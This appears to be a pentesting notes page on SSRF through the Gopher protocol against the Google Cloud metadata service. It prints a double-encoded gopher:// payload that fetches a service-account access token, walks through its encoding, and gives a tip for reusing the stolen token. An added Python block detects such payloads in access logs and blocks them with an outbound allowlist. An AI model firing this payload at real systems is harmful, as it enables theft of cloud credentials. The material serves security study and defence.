
SSRF using Gopher protocol

If we detect an SSRF vulnerability in a web app that is hosted on GCP, we may use specific protocols and URLs to request specific information from the metadata service, depending on the case.

URL Example:

gopher://metadata.google.internal:80/xGET%2520/computeMetadata/v1/instance/service-accounts/<snip>-compute@developer.gserviceaccount.com/token%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a%250aMetadata-Flavor:%2520Google%250d%250a

Breakdown

Protocol and Target: gopher://metadata.google.internal:80/

This part of the payload specifies that the Gopher protocol is being used to make a request to metadata.google.internal on port 80. metadata.google.internal is a special hostname used internally by Google Cloud to provide metadata information to VM instances.

Crafted Request: GET /computeMetadata/v1/instance/service-accounts/SERVICE_ACCOUNT/token

This is a GET request to the Google Cloud metadata service API, requesting an access token associated with a service account. We need to find out what service account is associated with the VM.

%2520HTTP%252f%2531%252e%2531

This is a double URL-encoded form of " HTTP/1.1" (the space, the slash and the version digits are each encoded twice).

%250AHost:%2520metadata.google.internal

This is an encoded line break followed by the Host header, which the metadata service expects.

%250AAccept:%2520%252a%252f%252a

Encoded header for the Accept field, indicating that any media type is acceptable in response.

%250aMetadata-Flavor:%2520Google

Importantly, this sets the Metadata-Flavor: Google header, which the metadata service requires on every request; requests without it are rejected.
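The breakdown above shows why such a payload is hard to spot in logs: the HTTP request to the metadata service only becomes visible after two rounds of percent-decoding. The following is an added example, not code from the original page, written from the defender's side. It peels the encoding layers off URLs found in access-log lines of a hypothetical /fetch?url= endpoint, flags the indicators this page describes (a non-HTTP scheme, double encoding, metadata-service references, smuggled line breaks), and shows the allowlist check an outbound fetcher should apply so that gopher:// and metadata hosts are never contacted. The log lines, the endpoint name and the service-account address are constructed for the example.

```python
"""Added example (not from the original page): detect double-encoded Gopher SSRF
payloads aimed at the GCP metadata service in access logs, and show the
outbound-URL allowlist check that stops them at the application layer."""
import ipaddress
import re
from urllib.parse import unquote, urlsplit

# Hostnames and substrings that mean a URL is aimed at the cloud metadata service.
METADATA_HOSTS = {"metadata.google.internal", "metadata", "169.254.169.254"}
METADATA_MARKERS = ("/computemetadata/", "metadata-flavor",
                    "metadata.google.internal", "169.254.169.254")
MAX_DECODE_ROUNDS = 5


def decode_layers(value: str) -> tuple[str, int]:
    """Percent-decode repeatedly until the string stops changing.

    Returns the fully decoded string and the number of rounds needed. Two or
    more rounds means double encoding: one layer is consumed by the vulnerable
    app's URL handling and the next by the Gopher client, so the raw HTTP
    request (GET ..., Host:, Metadata-Flavor:) appears only after both.
    """
    rounds = 0
    while rounds < MAX_DECODE_ROUNDS:
        decoded = unquote(value)
        if decoded == value:
            break
        value = decoded
        rounds += 1
    return value, rounds


def classify_url(url: str) -> list[str]:
    """Return the reasons a user-supplied URL looks like a metadata SSRF attempt (empty if clean)."""
    reasons = []
    decoded, rounds = decode_layers(url)
    lowered = decoded.lower()
    scheme = urlsplit(decoded).scheme.lower()
    if scheme not in ("http", "https"):
        reasons.append(f"non-HTTP scheme {scheme!r}")
    if rounds >= 2:
        reasons.append(f"double percent-encoding ({rounds} layers)")
    if any(marker in lowered for marker in METADATA_MARKERS):
        reasons.append("references the GCP metadata service")
    if "\n" in decoded or "\r" in decoded:
        reasons.append("embedded line breaks (smuggled request line/headers)")
    return reasons


# Hypothetical endpoint: GET /fetch?url=<remote url>, logged in common log format.
LOG_LINE = re.compile(r'"GET /fetch\?url=(?P<url>\S+) HTTP/1\.[01]"')

# Constructed sample log: one benign fetch, one plain metadata probe, and the
# double-encoded Gopher payload from this page (service account name made up).
# Note the "x" after the path slash: in a Gopher URL the first path character
# is the item type and is dropped by the client, so "xGET" is sent as "GET".
SAMPLE_LOG = [
    '10.0.0.5 - - [01/Jan/2024:12:00:00 +0000] "GET /fetch?url=https://example.com/feed.xml HTTP/1.1" 200 512',
    '10.0.0.9 - - [01/Jan/2024:12:00:07 +0000] "GET /fetch?url=http://169.254.169.254/computeMetadata/v1/ HTTP/1.1" 403 0',
    '10.0.0.9 - - [01/Jan/2024:12:00:15 +0000] "GET /fetch?url=gopher://metadata.google.internal:80/xGET%2520'
    '/computeMetadata/v1/instance/service-accounts/example-compute@developer.gserviceaccount.com/token'
    '%2520HTTP%252f%2531%252e%2531%250AHost:%2520metadata.google.internal%250AAccept:%2520%252a%252f%252a'
    '%250aMetadata-Flavor:%2520Google%250d%250a HTTP/1.1" 200 1024',
]


def scan_access_log(lines):
    """Run classify_url over every /fetch?url= request; return (line number, reasons) for hits."""
    hits = []
    for number, line in enumerate(lines, 1):
        match = LOG_LINE.search(line)
        if not match:
            continue
        reasons = classify_url(match.group("url"))
        if reasons:
            hits.append((number, reasons))
    return hits


def is_allowed_outbound(url: str) -> bool:
    """Allowlist check a server-side fetcher applies before making any request.

    Only http/https are fetched, so gopher://, file://, dict:// and friends are
    refused outright, and metadata, link-local, loopback and private addresses
    are refused even when the scheme is fine. A real fetcher must also resolve
    the hostname and apply the same address checks to every resolved address.
    """
    parts = urlsplit(url)
    if parts.scheme.lower() not in ("http", "https"):
        return False
    host = (parts.hostname or "").lower()
    if not host or host in METADATA_HOSTS:
        return False
    try:
        addr = ipaddress.ip_address(host)
    except ValueError:
        return True  # a DNS name that is not a known metadata alias
    return not (addr.is_link_local or addr.is_loopback or addr.is_private)


if __name__ == "__main__":
    for number, reasons in scan_access_log(SAMPLE_LOG):
        print(f"line {number}: " + "; ".join(reasons))
```

Running the block flags log lines 2 and 3; line 3 carries all four indicators, and the decoded form of its URL is the full metadata request that the breakdown walks through. The scheme and host checks in is_allowed_outbound are what prevent the app from ever issuing that request, whichever encoding the caller used.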

SSRF Payloads

List Service Accounts

Fetch Access Token of the listed Service Account

TIP: The response is HTML-encoded, so we can select the entire token, right-click it and select Convert selection > HTML > HTML-decode. After that, copy the token to your clipboard and then use it as an environment variable.

Command:
